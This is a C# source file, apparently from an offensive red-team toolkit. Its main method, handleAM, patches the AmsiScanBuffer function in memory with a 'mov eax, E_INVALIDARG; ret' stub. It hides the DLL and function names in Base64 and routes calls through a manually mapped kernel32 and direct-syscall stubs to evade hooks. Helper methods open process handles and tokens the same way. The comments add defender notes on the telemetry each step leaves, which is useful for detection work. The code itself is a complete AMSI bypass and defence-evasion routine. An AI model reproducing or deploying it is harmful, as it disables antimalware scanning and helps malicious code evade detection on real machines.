/// <summary>
/// Resolves the AMSI scanning export inside the current process and overwrites its
/// first bytes with a six-byte return stub. The Win32 exports are invoked through a
/// manually mapped copy of kernel32 (not the loaded one) and the write itself goes
/// through a direct-syscall stub for NtWriteVirtualMemory, so neither the import table
/// nor user-mode API hooks are traversed.
/// Defender's note: every step here leaves telemetry — a LoadLibrary of amsi.dll from
/// an unusual caller, a PAGE_READWRITE protection change on amsi.dll code pages, a
/// fresh private allocation that transitions RW -> RX, and a write into a loaded
/// module's code. Periodic integrity checks of amsi.dll's export prologues detect the
/// result regardless of which API performed the write.
/// </summary>
/// <param name="sysCall">Supplies syscall stubs and the manually mapped kernel32 image.</param>
/// <returns>
/// <c>false</c> when the export cannot be resolved or the syscall returns a non-zero
/// NTSTATUS; <c>true</c> otherwise. None of the three VirtualProtectEx results are
/// checked, so <c>true</c> does not prove the protections were changed or restored.
/// </returns>
public static bool handleAM(SysCallManager sysCall)
{
    // B8 57 00 07 80 C3 decodes to "mov eax, 0x80070057 ; ret" (E_INVALIDARG). This exact
    // byte sequence is a well-known signature in memory-scanning rules.
    var hook = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
    // oldProtect receives the original page protection; x is only a placeholder slot and
    // is never read back.
    uint oldProtect = 0, x = 0;
    // Direct-syscall stub bytes; their content is produced by sysCall and not visible here.
    var shellCode = sysCall.GetSysCallAsm("NtWriteVirtualMemory");
    // Private, manually mapped kernel32 image — itself an artefact (an unbacked PE image in
    // memory) that image-load and memory scanners can flag.
    DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
    // Base64 literal decodes to "amsi.dll"; encoded only to defeat plain string scanning.
    object[] loadLibrary = { Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw=")) };
    IntPtr libraryAddress = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA", typeof(DInvoke.Win32.DELEGATES.LoadLibrary), loadLibrary);
    // Base64 literal decodes to "AmsiScanBuffer".
    object[] procAddress = { libraryAddress, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")) };
    var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress", typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress);
    if (address == IntPtr.Zero) { return(false); }
    // (IntPtr)(-1) is the current-process pseudo-handle; 0x004 is PAGE_READWRITE. The
    // target code page is made writable and index 4 is the out-slot for the old protection.
    object[] parameters = { (IntPtr)(-1), address, (UIntPtr)hook.Length, (uint)0x004, oldProtect };
    // Also the current-process pseudo-handle, obtained a second way; the Process object is
    // never disposed.
    IntPtr hProcess = Process.GetCurrentProcess().Handle;
    // Result is never checked.
    IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
    // Presumably the helper writes by-ref outputs back into the argument array — confirm
    // against DInvoke.Generic.CallMappedDLLModuleExport.
    oldProtect = (uint)parameters[4];
    // The stub is first placed in a ReadWrite allocation and only later flipped to
    // ExecuteRead; that RW -> RX transition on a private region is a classic detection point.
    object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
    var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);
    Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
    // NtWriteVirtualMemory delegate type is declared elsewhere in the project; its
    // parameter layout is assumed to match the argument array below.
    var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtWriteVirtualMemory));
    var arguments = new object[] { hProcess, address, hook,
        (UIntPtr)(hook.Length), IntPtr.Zero };
    uint old = 0;
    parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, old };
    // Result is never checked; if this fails the next call runs a non-executable page.
    response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
    // Return value is treated as an NTSTATUS: zero means success.
    var returnValue = sysCallDelegate.DynamicInvoke(arguments);
    if ((int)returnValue != 0) { return(false); }
    // Restore the original protection on the patched page. The stub allocation is never
    // released, so the RX region stays resident for the life of the process.
    parameters = new object[] { (IntPtr)(-1), address, (UIntPtr)hook.Length, oldProtect, x };
    response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
    return(true);
}
/////////////////////////// Processes related functions ///////////////////////////
/// <summary>
/// Opens a handle to the process <paramref name="pid"/> via a direct-syscall stub for
/// NtOpenProcess rather than the documented OpenProcess API, with the allocation for the
/// stub made through a manually mapped kernel32 image.
/// Defender's note: the stub lives in a region allocated ExecuteReadWrite (RWX) — private
/// RWX memory plus a syscall issued from outside ntdll is a high-signal combination for
/// memory scanners and kernel-side call-stack inspection.
/// </summary>
/// <param name="pid">Target process id.</param>
/// <param name="handle">Receives the opened handle, or <see cref="IntPtr.Zero"/> on a non-zero NTSTATUS.</param>
/// <param name="flags">Desired access mask passed to NtOpenProcess.</param>
/// <param name="sysCall">Supplies syscall stubs and the manually mapped kernel32 image.</param>
public static void GetProcessHandle(int pid, out IntPtr handle, DInvoke.Win32.Kernel32.ProcessAccessFlags flags, SysCallManager sysCall)
{
    handle = IntPtr.Zero;
    // Only UniqueProcess is set; the thread id is left empty.
    var clientId = new DInvoke.Win32.Kernel32.CLIENT_ID() { UniqueProcess = new IntPtr(pid), UniqueThread = IntPtr.Zero };
    var objectAtt = new DInvoke.Win32.Kernel32.OBJECT_ATTRIBUTES(null, 0);
    DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
    var shellCode = sysCall.GetSysCallAsm("NtOpenProcess");
    // RWX allocation: no later protection change is performed here, unlike handleAM.
    object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite };
    var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);
    Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
    // NtOpenProcess delegate type is declared elsewhere in the project.
    var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcess));
    // token is never used.
    var token = IntPtr.Zero;
    // arguments[0] is the out-slot for the handle; presumably the delegate declares it
    // by-ref so DynamicInvoke writes it back into the array — confirm against the delegate.
    var arguments = new object[] { handle, flags, objectAtt, clientId };
    // Return value is treated as an NTSTATUS: zero means success. The stub allocation is
    // never released.
    var returnValue = sysCallDelegate.DynamicInvoke(arguments);
    handle = (int)returnValue == 0 ? (IntPtr)arguments[0] : IntPtr.Zero;
}
/// <summary>
/// Opens the primary token of <paramref name="handle"/> via a direct-syscall stub for
/// NtOpenProcessToken. The stub is staged in a ReadWrite allocation and switched to
/// ExecuteRead (through the manually mapped kernel32) immediately before it runs.
/// Defender's note: a private region that goes RW -> RX right before a syscall from a
/// non-ntdll address is the same pattern as in handleAM and is equally observable.
/// </summary>
/// <param name="handle">Process handle the token is opened from.</param>
/// <param name="access">Desired token access mask.</param>
/// <param name="currentToken">Receives the token handle, or <see cref="IntPtr.Zero"/> on a non-zero NTSTATUS.</param>
/// <param name="sysCall">Supplies syscall stubs and the manually mapped kernel32 image.</param>
public static void GetProcessToken(IntPtr handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS access, out IntPtr currentToken, SysCallManager sysCall)
{
    DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
    var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken");
    // Staged as ReadWrite first; made executable below.
    object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
    var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);
    Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
    // NtOpenProcessToken delegate type is declared elsewhere in the project.
    var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken));
    // token is the out-slot placed at arguments[2] and read back after the call.
    var token = IntPtr.Zero;
    var arguments = new object[] { handle, access, token };
    uint oldProtect = 0;
    // (IntPtr)(-1) is the current-process pseudo-handle. The result is never checked; if
    // the protection change fails the next call runs a non-executable page.
    object[] parameters = { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect };
    IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
    // Return value is treated as an NTSTATUS: zero means success. The stub allocation is
    // never released.
    var returnValue = sysCallDelegate.DynamicInvoke(arguments);
    currentToken = (int)returnValue == 0 ? (IntPtr)arguments[2] : IntPtr.Zero;
}
/// <summary>
/// Overload of GetProcessToken that takes the unqualified <c>TokenAccessFlags</c> enum
/// and allocates the stub with a direct <c>VirtualAlloc</c> call (declared elsewhere)
/// instead of the manually mapped kernel32. Which overload binds depends only on the
/// static type of the <paramref name="access"/> argument at the call site.
/// Defender's note: the stub region is allocated ExecuteReadWrite and never flipped, so
/// this variant leaves a persistent private RWX page behind.
/// </summary>
/// <param name="handle">Process handle the token is opened from.</param>
/// <param name="access">Desired token access mask.</param>
/// <param name="currentToken">Receives the token handle, or <see cref="IntPtr.Zero"/> on a non-zero NTSTATUS.</param>
/// <param name="sysCall">Supplies the NtOpenProcessToken syscall stub.</param>
public static void GetProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SysCallManager sysCall)
{
    var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken");
    // RWX allocation via the regular (hookable) VirtualAlloc import; never released.
    var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
    Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
    // NtOpenProcessToken delegate type is declared elsewhere in the project.
    var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken));
    // token is the out-slot placed at arguments[2] and read back after the call.
    var token = IntPtr.Zero;
    var arguments = new object[] { handle, access, token };
    // Return value is treated as an NTSTATUS: zero means success.
    var returnValue = sysCallDelegate.DynamicInvoke(arguments);
    currentToken = (int)returnValue == 0 ? (IntPtr)arguments[2] : IntPtr.Zero;
}
/// <summary>
/// Overload of GetProcessHandle that takes the unqualified <c>ProcessAccessFlags</c>
/// enum and allocates the NtOpenProcess stub with a direct <c>VirtualAlloc</c> call
/// (declared elsewhere) rather than through the manually mapped kernel32. Apart from the
/// allocation path it mirrors the DInvoke-qualified overload above.
/// Defender's note: as in that overload the stub lives in a private ExecuteReadWrite
/// region that is never released or re-protected.
/// </summary>
/// <param name="pid">Target process id.</param>
/// <param name="handle">Receives the opened handle, or <see cref="IntPtr.Zero"/> on a non-zero NTSTATUS.</param>
/// <param name="flags">Desired access mask passed to NtOpenProcess.</param>
/// <param name="sysCall">Supplies the NtOpenProcess syscall stub.</param>
public static void GetProcessHandle(int pid, out IntPtr handle, ProcessAccessFlags flags, SysCallManager sysCall)
{
    handle = IntPtr.Zero;
    // Only UniqueProcess is set; the thread id is left empty.
    var clientId = new CLIENT_ID() { UniqueProcess = new IntPtr(pid), UniqueThread = IntPtr.Zero };
    var objectAtt = new OBJECT_ATTRIBUTES(null, 0);
    var shellCode = sysCall.GetSysCallAsm("NtOpenProcess");
    // RWX allocation via the regular (hookable) VirtualAlloc import; never released.
    var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);
    Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
    // NtOpenProcess delegate type is declared elsewhere in the project.
    var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcess));
    // token is never used.
    var token = IntPtr.Zero;
    // arguments[0] is the out-slot for the handle; presumably the delegate declares it
    // by-ref so DynamicInvoke writes it back into the array — confirm against the delegate.
    var arguments = new object[] { handle, flags, objectAtt, clientId };
    // Return value is treated as an NTSTATUS: zero means success.
    var returnValue = sysCallDelegate.DynamicInvoke(arguments);
    handle = (int)returnValue == 0 ? (IntPtr)arguments[0] : IntPtr.Zero;
}